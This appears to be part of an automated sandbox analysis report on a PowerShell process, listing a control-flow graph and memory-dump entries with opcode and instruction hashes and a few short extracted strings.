            control_flow_graph 792 7ff9c5b71dfd-7ff9c5b71e09 793 7ff9c5b71e0b 792->793 794 7ff9c5b71e0c-7ff9c5b71e1d 792->794 793->794 795 7ff9c5b71e1f 794->795 796 7ff9c5b71e20-7ff9c5b71e31 794->796 795->796 797 7ff9c5b71e33 796->797 798 7ff9c5b71e34-7ff9c5b71e45 796->798 797->798 799 7ff9c5b71e47 798->799 800 7ff9c5b71e48-7ff9c5b71eca 798->800 799->800 803 7ff9c5b71ecc-7ff9c5b71ed6 800->803 804 7ff9c5b71ed8 800->804 805 7ff9c5b71edd-7ff9c5b71edf 803->805 804->805 806 7ff9c5b72188-7ff9c5b721a5 805->806 807 7ff9c5b71ee5-7ff9c5b71eee 805->807 814 7ff9c5b721ac-7ff9c5b721af 806->814 809 7ff9c5b71ef4-7ff9c5b71f16 807->809 810 7ff9c5b71fa1-7ff9c5b71fea 807->810 820 7ff9c5b7204b-7ff9c5b7204e 809->820 821 7ff9c5b71f1c-7ff9c5b71f4c 809->821 817 7ff9c5b71ff0-7ff9c5b72001 810->817 818 7ff9c5b71fec-7ff9c5b71fed 810->818 819 7ff9c5b721b2-7ff9c5b721cb call 7ff9c5b72213 814->819 831 7ff9c5b72007-7ff9c5b72012 817->831 832 7ff9c5b72003-7ff9c5b72004 817->832 818->817 823 7ff9c5b72050-7ff9c5b72056 820->823 824 7ff9c5b7205b-7ff9c5b72093 820->824 828 7ff9c5b71f4e-7ff9c5b71f4f 821->828 829 7ff9c5b71f52-7ff9c5b71f63 821->829 823->819 840 7ff9c5b72099-7ff9c5b720af 824->840 841 7ff9c5b72174-7ff9c5b7217c call 7ff9c5b721cc 824->841 828->829 836 7ff9c5b71f69-7ff9c5b71f74 829->836 837 7ff9c5b71f65-7ff9c5b71f66 829->837 831->820 839 7ff9c5b72014-7ff9c5b72046 831->839 832->831 836->820 849 7ff9c5b71f7a-7ff9c5b71f9c 836->849 837->836 839->819 843 7ff9c5b720c3-7ff9c5b720d9 840->843 844 7ff9c5b720b1-7ff9c5b720c2 840->844 841->814 853 7ff9c5b720db-7ff9c5b720ee 843->853 854 7ff9c5b720f5-7ff9c5b72102 843->854 844->843 849->819 853->854 856 7ff9c5b72106-7ff9c5b7210c 854->856 857 7ff9c5b7212e-7ff9c5b72132 856->857 858 7ff9c5b7210e-7ff9c5b72126 856->858 860 7ff9c5b72158-7ff9c5b7215c 857->860 861 7ff9c5b72134-7ff9c5b7214a 857->861 858->840 862 7ff9c5b7212c 858->862 863 7ff9c5b7216e-7ff9c5b72186 call 7ff9c5b721cc 860->863 864 7ff9c5b7215e-7ff9c5b72168 860->864 868 7ff9c5b72150-7ff9c5b72156 861->868 869 7ff9c5b7214c-7ff9c5b7214d 861->869 862->841 863->819 864->863 868->860 869->868
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d3d6919392236fe2fc3b45f150d23ce2892d546a7aad15000da87236f7a8fbd0
            • Instruction ID: 256393223fd8c3a3c4599aadc4e1116796d2af4dd26d41e039a5992a211fc239
            • Opcode Fuzzy Hash: d3d6919392236fe2fc3b45f150d23ce2892d546a7aad15000da87236f7a8fbd0
            • Instruction Fuzzy Hash: AFD19330A1CE4A8FDB95EF28C464BA9BBE1FF59740F1400B9D44ED72A6CE65B841CB50
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dfe647db97e5c934a927e4351ac3deb9eb4e2f90307c70d064f4649ce2ba0bc0
            • Instruction ID: 1f5751f8351428fdf9ecc8a5327f5d0255d9b10d98efa58943b204c665df9444
            • Opcode Fuzzy Hash: dfe647db97e5c934a927e4351ac3deb9eb4e2f90307c70d064f4649ce2ba0bc0
            • Instruction Fuzzy Hash: C1B1E132E0C61B8BE764EF2898453FA7BD0EF15714F14417AD84DD7293EF68B8418A85
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cc7e384a982ed7ac277e721bcce124b62b4b18c80d246dfc4a30031c72565e0
            • Instruction ID: a5974f76ab390038f9a0f52d58cd1cde99567f555b6cf9357bfc2037f98b2927
            • Opcode Fuzzy Hash: 4cc7e384a982ed7ac277e721bcce124b62b4b18c80d246dfc4a30031c72565e0
            • Instruction Fuzzy Hash: ED712731E0CA4A4FEB58DF5888657B97FE1FF58790F44017ED40DD72A2CEA4A8028780
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2d5e2a5d35d085c7c3e8e9975b072370119075aa8399b49cbcc8e520db4df83
            • Instruction ID: edec347b635945f2d7a441cfc3ca9464171fcf1212d4d78cb649e51f5e310503
            • Opcode Fuzzy Hash: b2d5e2a5d35d085c7c3e8e9975b072370119075aa8399b49cbcc8e520db4df83
            • Instruction Fuzzy Hash: 5761D531E0CA0E4FEB58DE5898657B97BE1FB98790F54013ED40DD7292DEA5B8028B90
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b526dd0fc4f981776b86ef8d1aba2d9e1372570d10609d907e07c495431fedc
            • Instruction ID: c683fcf63ff13d91d3cb6fb6b7361dfe375cc1f14556be5c6dc322625a1e2836
            • Opcode Fuzzy Hash: 4b526dd0fc4f981776b86ef8d1aba2d9e1372570d10609d907e07c495431fedc
            • Instruction Fuzzy Hash: 38814D30A18A4A8FEB58EF18C855BA977E2FF99700F544179E40DD7296CE74B842CB81
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 326b45ac08b699a53262d6a9a0c9fcb31798f14863e233bac4c320ace9f76583
            • Instruction ID: 30cbbbd141ae4490200897f6ff9a417e58c9e89f82eca13cd697341a39a3dd99
            • Opcode Fuzzy Hash: 326b45ac08b699a53262d6a9a0c9fcb31798f14863e233bac4c320ace9f76583
            • Instruction Fuzzy Hash: F2510335A08A4E5FEB50EB29D8846F637E2FFC6311F14057BD40DC7182EA6AE842CB40
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fd1e08c0cb4feb63955da2045b51f82f28792ba680bb79220363e45d0edb29d3
            • Instruction ID: ad2bf5f46fc30e8e880d5fe1033404247cf5f16d90b1db7ae16259653e90cce2
            • Opcode Fuzzy Hash: fd1e08c0cb4feb63955da2045b51f82f28792ba680bb79220363e45d0edb29d3
            • Instruction Fuzzy Hash: AD519F3190CB498FDB58DF1CD8457B9BBE0EB99711F00822EE44EC3295DBB4E5158B86
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 771b15c6d22ac916967d4544be0004c022b58bec0f9db98aa4c4585855854195
            • Instruction ID: ed16bb6668ed35b5ae8ac05ceeedca72c625721b245b9c2f246b1779af7b04f0
            • Opcode Fuzzy Hash: 771b15c6d22ac916967d4544be0004c022b58bec0f9db98aa4c4585855854195
            • Instruction Fuzzy Hash: 1E51E930A1CB494FDB58DB1CD856BA97BE0FB99310F04426FE44DD3292DB64B856CB82
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b18e4f24619a6a4e9856e216b8b0b93709a48c4f1c508b1972d997c913b0ebe5
            • Instruction ID: 5b92a43613a6a645ce8a55a4d4bb4bda139b36f1ffc3bd693ad73ec7f8cc893a
            • Opcode Fuzzy Hash: b18e4f24619a6a4e9856e216b8b0b93709a48c4f1c508b1972d997c913b0ebe5
            • Instruction Fuzzy Hash: 4C41D13090DF4A4BDB5CEB2C98467B9BBE0FB95715F00823ED04AC3251DBB4B5168B85
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 15798df58f79709aca7616d7b42686263b6abd2306f59702927b5be98c0a5d39
            • Instruction ID: 697ff4780ae80a9551feaad4adf4c4deb0cbab30e1929f686af8b815002a4640
            • Opcode Fuzzy Hash: 15798df58f79709aca7616d7b42686263b6abd2306f59702927b5be98c0a5d39
            • Instruction Fuzzy Hash: BC41F731A0CE4D4FDB99EB6C98557F97BE1FF9A320F04426BD00DD3192DE6468068B81
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d4eddef95e090dc5b8a076252ea4751c39a66bebe6bd067a819cdf68fbc4a7b
            • Instruction ID: 203c3fd0ca4fa599c40299155c0941529f30aed04e5091c6b7b451c972cd1ec1
            • Opcode Fuzzy Hash: 8d4eddef95e090dc5b8a076252ea4751c39a66bebe6bd067a819cdf68fbc4a7b
            • Instruction Fuzzy Hash: 26418631A1990B4FEB54EF7898556FE7BE1FF58351F00017AE40DD72D2DE68A8428B90
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e14b037004ea87605f3bddd2b448833ac99e9c5bd83f961298cae6ec2000986c
            • Instruction ID: 051c3c41016c25298bd4637a419ca33b6f056708079a2b68ff4ce1fd122f5a36
            • Opcode Fuzzy Hash: e14b037004ea87605f3bddd2b448833ac99e9c5bd83f961298cae6ec2000986c
            • Instruction Fuzzy Hash: A541507091C75A8FDB58DF08D8527A9BBE0FF59B00F10056EE58AD3291CB75B8428F82
            Memory Dump Source
            • Source File: 00000022.00000002.2038623000.00007FF9C53B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C53B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c53b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47c0fe0d2456dc8ce0fef8ae77d26986337a48e721d450d0537b22a5b7210b85
            • Instruction ID: 8ef6ba8726067f65c7f65a6ab873a3ae9f2c828850a05100dfb444ad78b43225
            • Opcode Fuzzy Hash: 47c0fe0d2456dc8ce0fef8ae77d26986337a48e721d450d0537b22a5b7210b85
            • Instruction Fuzzy Hash: BE31E357E1CAC74EE352EB3868952A5ABD0EF4B61870800FBD88DDA1D3EC4868464652
            Memory Dump Source
            • Source File: 00000022.00000002.2055262538.00007FF9C5750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5750000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5750000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2fafff50ee4e5ca913d998a3c94ec1e74fce7eaf3ba2bd5fcb22d91e6ca1207c
            • Instruction ID: b939e290bc58f8d38ff4252351eca759f09439343e865f1e282d37bca1fa6aab
            • Opcode Fuzzy Hash: 2fafff50ee4e5ca913d998a3c94ec1e74fce7eaf3ba2bd5fcb22d91e6ca1207c
            • Instruction Fuzzy Hash: 9F219B71E1C5174AF678D90DA4413792285EB89F10FA442BAD88EC23D5CDAD7CC74A85
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d9237e09e660eb5919031816ddc7dbd5b27d8cce764e14951ad01fa172c425e
            • Instruction ID: 7b0b03f8046db08e1dfd27f51229e9a2d365c1d3818521b30175852276e456df
            • Opcode Fuzzy Hash: 4d9237e09e660eb5919031816ddc7dbd5b27d8cce764e14951ad01fa172c425e
            • Instruction Fuzzy Hash: CC212D30A14A4E4FDB84EF18C8A57FA7BE1FF58740F104579E40DD7296CA75A841CB80
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0dfc5a91b971d9b4d0cf295b334876d04d73685344c5116d2cdf16629c3d85ee
            • Instruction ID: 20dda6a99cfad0a6df9355ee86c0bc73962007e235112272055949da759fb464
            • Opcode Fuzzy Hash: 0dfc5a91b971d9b4d0cf295b334876d04d73685344c5116d2cdf16629c3d85ee
            • Instruction Fuzzy Hash: B021043180E6C25FF31397341C16285BFA09F436A4F1802EAC494C74F3D9A9281AC7B2
            Memory Dump Source
            • Source File: 00000022.00000002.2055262538.00007FF9C5750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5750000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5750000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b74846947cbb72eab1ec11167227f12df53a7c311212a0c14fdf569ff80c6272
            • Instruction ID: cb89ce9b20e3b286b253b7ffecf087cc426a8d73a87ef130101789c8e24d4a0a
            • Opcode Fuzzy Hash: b74846947cbb72eab1ec11167227f12df53a7c311212a0c14fdf569ff80c6272
            • Instruction Fuzzy Hash: F811C834B1CA0A4BF254EA1DA44237533D1EF8AB11F6042B9D88ED7386CD28BC434BC5
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 348456506d8a376c3fec48c91b4443e4ec27991cd9091beb285875adb44c5e00
            • Instruction ID: cb26e98050e04ff08ecddb35bf27ef48ff2ae9111d2218b1801d8cd54c19b29e
            • Opcode Fuzzy Hash: 348456506d8a376c3fec48c91b4443e4ec27991cd9091beb285875adb44c5e00
            • Instruction Fuzzy Hash: 6A110870A0CB588FDB98DF48D8556ADBBF1FB99311F10056FE04DE3661DB71A8818B82
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d55d327573c46861f10e2d8fd1ad11964588250a69fe3fd609b4a8bd967ea06
            • Instruction ID: 548ee5a9a58ac9ba7cb7efbfa3b35ee5f345d3ff0a17fe218496753e8e53a299
            • Opcode Fuzzy Hash: 3d55d327573c46861f10e2d8fd1ad11964588250a69fe3fd609b4a8bd967ea06
            • Instruction Fuzzy Hash: 6B01522161DB881FCB89DB2CA854A217BE1EFDA21571941DFE44CC72A3C915E805C752
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 954fe0db7c9c0078705c2d987ab54ba4bdc38b6cbacb959dab4a6ba378572b72
            • Instruction ID: c9fd0b8a4108539eaae201e771302890c8efdab1cba48952cdde77c593a17e3c
            • Opcode Fuzzy Hash: 954fe0db7c9c0078705c2d987ab54ba4bdc38b6cbacb959dab4a6ba378572b72
            • Instruction Fuzzy Hash: 4B01F71564DACB0ED753972818302A67FA0EE83161B0801F7E0A8C6093EC482919C792
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ca7bc3aea2dbd283627057526afc12818f6ffec5b334cb28df596efe06a44c98
            • Instruction ID: 1d0e4630e9600d08be13b1fa643244f1dfa13f978d6d60a77e01f2a0a764720f
            • Opcode Fuzzy Hash: ca7bc3aea2dbd283627057526afc12818f6ffec5b334cb28df596efe06a44c98
            • Instruction Fuzzy Hash: 05C08C22C0F58709FF25A13A089A1502E818B87924BCA90FAC40887096ECEEA8034701
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f75d3712ce808ae6d537a9e7d52228076742ed9b8e112294858d8b9de76f677
            • Instruction ID: 57ee3b8b4b142a527d8e3a141cfd6568188d20b4594548a3d33695150cd7672f
            • Opcode Fuzzy Hash: 1f75d3712ce808ae6d537a9e7d52228076742ed9b8e112294858d8b9de76f677
            • Instruction Fuzzy Hash: E8C09B15D6941702AD1CF972089617664129745900FD594B5DC05C00D9DD9EE5961551
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"$6"$6"$6"
            • API String ID: 0-3140776990
            • Opcode ID: 4b95386da1b78af5068ceff2ad7e051a85bb87c2e10e20d422b204f8c1a8cc96
            • Instruction ID: c82be0066817139920248f116ea98dbb1f1a57b455ed19b2c693e499cbede61d
            • Opcode Fuzzy Hash: 4b95386da1b78af5068ceff2ad7e051a85bb87c2e10e20d422b204f8c1a8cc96
            • Instruction Fuzzy Hash: 5492F630B08A4A4FEB94EF2C98657B57BE1FF99700F4401BAD44DC72A2DE64EC018B91
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$Sl$Sl$sE
            • API String ID: 0-3503539951
            • Opcode ID: 292992cf6d8f77cfe672af58fb04c10459b2aa81f49b2f3a0b38a5db34ce8792
            • Instruction ID: 0edd061f65fcc4c57528bba2122a94b647062d0ee9c7360465302899ea7dd29f
            • Opcode Fuzzy Hash: 292992cf6d8f77cfe672af58fb04c10459b2aa81f49b2f3a0b38a5db34ce8792
            • Instruction Fuzzy Hash: 4AC2F121A1CA4B0FE7A8EF28584577977D1EF99B10F44417ED44EC32D7DE68B8428B82
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"$6"
            • API String ID: 0-3920047490
            • Opcode ID: ae5b1abb6dd589b4a30e984f90c1bb15529e7fe531f22bfcaa762bded8cea294
            • Instruction ID: b87d1cd911826169e2bfd069d730f4050836dd6fdea60386f1bd9d92a79aaf77
            • Opcode Fuzzy Hash: ae5b1abb6dd589b4a30e984f90c1bb15529e7fe531f22bfcaa762bded8cea294
            • Instruction Fuzzy Hash: FE12E532B0CA8A4FEBA4EF2894553757BD1FFDA700F5441BAD44DC3292DE69B8428B41
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"
            • API String ID: 0-583208020
            • Opcode ID: c3fe13db778059fa77e08f34d45a2b5e2272bd41812b20d2719f93466b67376c
            • Instruction ID: a8b28223a65126ce067dbd1fde5ca56d6df6d52f0974b29075bfd9da74e61362
            • Opcode Fuzzy Hash: c3fe13db778059fa77e08f34d45a2b5e2272bd41812b20d2719f93466b67376c
            • Instruction Fuzzy Hash: 4FD1D36171C94A4FEB94EF2C9869BB57BD1EF5A750F0400BAE44DC72A3DE24AC418B81
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$'_H
            • API String ID: 0-3728610162
            • Opcode ID: f7bacb3001890941aa90d57d85b31c9306b1458080139c3d220004d370200dc0
            • Instruction ID: e479fabf73062b3baf162763ab4a5941284860b3ef2d974493190e958caf2d60
            • Opcode Fuzzy Hash: f7bacb3001890941aa90d57d85b31c9306b1458080139c3d220004d370200dc0
            • Instruction Fuzzy Hash: 9182D021A1CA4A4FEBA8EF2C485577977D2FB99B00F54417EE04EC32D7DE64B8418B81
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$x~{!
            • API String ID: 0-1230893045
            • Opcode ID: 6e4a75622cc108c5c12e6bd9d4c401071871320911c4e3b02fce6b0a59ee8629
            • Instruction ID: a943a016280e7d0f38c132d9a877feaa307566f8ebdaa6d3eb6f4c3a03af5701
            • Opcode Fuzzy Hash: 6e4a75622cc108c5c12e6bd9d4c401071871320911c4e3b02fce6b0a59ee8629
            • Instruction Fuzzy Hash: 42D11870A08E8A4FEB48EF2898596B97BE1FF99301F5441BDD04EDB2D6CE74A841C740
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$x~{!
            • API String ID: 0-1230893045
            • Opcode ID: db4ae84169db987f90ecae3f65d09dc65a90e5050710356c87c6d60939c124ac
            • Instruction ID: 8f4c3125536efdee03cef3eba5b977ac00ff392cf15f585108da316ad9fc860d
            • Opcode Fuzzy Hash: db4ae84169db987f90ecae3f65d09dc65a90e5050710356c87c6d60939c124ac
            • Instruction Fuzzy Hash: FDC12770E08E8A4FEB48EF2898596B97BE1FF99701F5441BDD04EDB2D6CE74A8418740
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: /"
            • API String ID: 0-3359577793
            • Opcode ID: 455d2bb68a2f2c8ad5973f461f2b41368a84bd716a15746bb6158d3a72043cb5
            • Instruction ID: 280313abd8958dc2dc7a17af328ac7a0d983a0b45a58397251460d38a7ab0dd3
            • Opcode Fuzzy Hash: 455d2bb68a2f2c8ad5973f461f2b41368a84bd716a15746bb6158d3a72043cb5
            • Instruction Fuzzy Hash: 8A421925A0C7875FE714EB28A8923F63BD1EF46704F1481B9D48DC7293DE6AB8468781
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: ffc5f004d1d46801861b31d7d01660c177281dd8a2c98b24537d936cd2e85939
            • Instruction ID: 430bb52a34ff406304111e6ba306abc3709837abd2545f62d4ea17c5a6835c64
            • Opcode Fuzzy Hash: ffc5f004d1d46801861b31d7d01660c177281dd8a2c98b24537d936cd2e85939
            • Instruction Fuzzy Hash: 57C11370A1DA8A8FE795EF7888553B97BE1FF4A305F1440BAE04DD7293CE686841CB41
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79abe44eea6129ba2499b07317d48c2f1fb596a776c5b7431557b4e47265375c
            • Instruction ID: f0b4f1721ad3395ce6a3fa1c6c59fe811b8f69e41c269a5c5df8d3bd73eed0ec
            • Opcode Fuzzy Hash: 79abe44eea6129ba2499b07317d48c2f1fb596a776c5b7431557b4e47265375c
            • Instruction Fuzzy Hash: 7D327570A28A4A8FD798EF38801536AB6D2FF8D705F50867DD04EC7396DE79B8418B40
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 68728bb3f596f7e8b0095aa95f1c54035742bddc2d32c0c3ef5f230f32ec3804
            • Instruction ID: fd1dca87ef8b846ba85ebcdf8f11ec2e69ce9342b4216fc85370b298b0381b0d
            • Opcode Fuzzy Hash: 68728bb3f596f7e8b0095aa95f1c54035742bddc2d32c0c3ef5f230f32ec3804
            • Instruction Fuzzy Hash: EF026270A286498FD759EF38901536AB7D2FF8D305F518ABDE08EC7366DA35E4028B01
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7158c34332d1422d5ecf7112af10fb0299d7558cba5698ee7accc77842eb37a
            • Instruction ID: b20c7e04460a46c36302da936d46ae253d13bb8738757af729a3310452e0d6f8
